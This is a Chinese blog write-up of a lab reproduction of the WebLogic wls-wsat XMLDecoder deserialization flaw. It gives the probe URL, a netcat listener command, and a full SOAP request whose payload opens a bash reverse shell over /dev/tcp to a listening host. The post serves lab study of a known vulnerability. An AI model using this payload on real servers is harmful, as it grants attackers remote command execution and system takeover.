weblogic中wls组件XMLDecode反序列化漏洞复现

最新推荐文章于 2023-02-21 11:08:39 发布
最新推荐文章于 2023-02-21 11:08:39 发布
阅读量293 收藏 1
点赞数
分类专栏: 中间件漏洞 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45746681/article/details/109032448
版权

文章目录

漏洞原理

  • Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。

复现

  • Kali docker 容器中启动此漏洞环境
  • 在这里插入图片描述

访问网页http://192.168.193.129:7001//wls-wsat/CoordinatorPortType
响应结果为以下类型证明可能存在该漏洞
在这里插入图片描述

  • getshell利用方式
    在本地监听666端口,执行命令为nc -lvvp 6666
    *请求包如下:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.193.129:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 643

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.193.129/6666 0&gt;&amp;1</string> 
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

在这里插入图片描述
在这里插入图片描述
成功

qq_45746681
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Weblogic 反序列化漏洞解决补丁文件
03-24
这个是自制的Weblogic 反序列化漏洞解决补丁文件。经过测试。 使用方法: 将weblogic_patch.jar 放在linux的以下目录: $WL_HOME/Middleware/patch_wls1036/profiles/default/sys_manifest_classpath $WL_HOME是...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ)
01-09
然而,与所有软件一样,Weblogic也存在安全漏洞,其CVE-2017-10271是一个著名的反序列化漏洞。 CVE-2017-10271漏洞源于Weblogic服务器WLS-Windows-Autopatch组件处理特定类型输入的反序列化过程。这个组件是...
又一次漏洞复现与分析
qq_53058639的博客
02-21 93
WeblogicWLS Security组件对外提供webservice服务,其使用了XMLDecoder来解析用户传入的XML数据,在解析的过程出现反序列化漏洞,导致可执行任意命令。攻击者发送精心构造的xml数据甚至能通过反弹shell拿到权限。XMLDecoder来解析用户传入的XML数据,在解析的过程出现反序列化漏洞,导致可执行任意命令执行。
weblogic-SSRF
anna11119的博客
07-26 650
https://github.com/vulhub/vulhub/tree/master/weblogic/ssrf Weblogic SSRF漏洞 Weblogic存在一个SSRF漏洞,利用该漏洞可以发送任意HTTP请求,进而攻击内网redis、fastcgi等脆弱组件。 测试环境搭建 编译及启动测试环境 docker-compose build docker-comp...
weblogic wls-wsat组件远程命令执行(CVE-2017-3506)
YouthBelief的博客
11-01 7626
weblogic wls-wsat组件远程命令执行(CVE-2017-3506) 前言 与weblogic 反序列化(CVE-2017-10271)类似 一般情况下weblogic会开放7001以及7002端口 0x01 漏洞描述 wls-wsat组件远程命令执行 如果访问/wls-wsat/CoordinatorPortType11目录,存在下图则说明或许存在漏洞 /wls-wsat/CoordinatorPortType11 0x02 影响范围 OracleWebLogic Server10.3.6.
WebLogic XMLDecoder反序列化漏洞-CVE-2017-10271
m0_49025459的博客
06-05 386
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之漏洞url: http://:7001/wls-wsat/CoordinatorPortType通过构造SOAP(XML)格式的请求,在解析的过程导致X...
weblogic反序列化漏洞测试工具python脚本
05-22
`CVE-2018-2628`是一个具体的WebLogic反序列化漏洞,它涉及到WebLogic Server的WLS-Windows服务组件。该漏洞是由于在处理T3协议请求时,WebLogic未能正确验证反序列化的数据,从而允许远程未经身份验证的攻击者通过...
CVE-2017-10271 Weblogic反序列化漏洞补丁(FMJJ) 自己已经打上补丁了。欢迎下载
02-24
漏洞主要存在于WebLogic WLS Core Components组件的`weblogic.utils.classloaders.GenericClassLoader`类。在处理HTTP请求时,该类不正确地处理了反序列化的数据,没有进行足够的输入验证和安全检查。攻击者可以...
Weblogic XML反序列化漏洞CVE-2017-10271
04-16
Weblogic XML反序列化漏洞CVE-2017-10271是Oracle WebLogic Server的一个严重安全问题,该漏洞允许攻击者通过精心构造的XML输入来远程执行代码,从而对受影响的系统造成破坏。这个漏洞主要涉及到WebLogic Server在...
关于禁用weblogic wls-wsat组件的步骤说明
09-03
WebLogic WLS组件漏洞,文档描述如何通过禁用组件的方式来修补漏洞
关于WebLogic Server WLS核心组件存在反序列化漏洞安全公告
05-07
安全公告编号:CNTA-2018-0015,漏洞影响范围 根据官方公告情况,该漏洞的影响版本如下: WebLogic10.3.6.0 WebLogic12.1.3.0 WebLogic12.2.1.2 WebLogic12.2.1.3 、临时修复建议:通过设置weblogic.security.net.ConnectionFilterImpl默认连接筛选器,对T3/T3s协议的访问权限进行配置,阻断漏洞利用途径。 2、美国甲骨文公司已发布了修复补丁,建议及时更新至最新版本:http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html。
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
weblogic Weblogic WLS组件漏洞处置 补丁10.3.6.0.0升级10.3.6.0.12
01-09
文件有两个patch需要打,然后有测试工具和补丁教程可以参看
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
Boom!脑洞大爆炸的博客
11-11 1253
Weblogic XMLDecoder 远程代码执行漏洞 CVE-2017-10271 漏洞复现
weblogic.xml的配置-项目发布jar包冲突
学无止境
03-10 5578
weblogic.xml配置 前些天在项目调试的时候,发现项目在本地eclipse上跑的时候,项目发布的接口是可以正常调用的(tomcat容器) ,然后部署到服务器上接口调用报错。(linux系统,weblogic 12c) 后来经过一步步排除问题,发现是weblogic本身自带的jar和我项目里的jar冲突了。(足足折腾了我好几个小时。。。) 我在部署的时候,没有将weblogic.xml加上...
WebLogic WLS组件漏洞复现
张无忌_蜘蛛侠的博客
01-11 6490
WebLogic WLS组件漏洞复现
[Java安全]XMLDecoder反序列化学习(一)
feng的博客
09-07 888
前言 上周五看了GKCTF的babycat那题,接触了XMLDecoder的漏洞,看了几天还是没看太明白。。。太菜了呜呜。。所以这是第一篇,暂时分析到这里,前面的处理XML的流程没看明白,光写篇文章理一下后面的部分。等以后再来填坑了。 只是简单的记录自己的调试过程,非常失败,没搞太懂。 利用 利用就是,写一个这样的xml: <java> <object class="java.lang.ProcessBuilder"> <array class="jav
weblogic反序列化漏洞复现
最新发布
10-16
weblogic反序列化漏洞是一种比较严重的安全漏洞,攻击者可以利用该漏洞执行任意代码。下面是一个简单的漏洞复现过程: 1. 下载ysoserial工具,生成一个恶意的序列化数据,例如: ``` java -jar ysoserial.jar ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值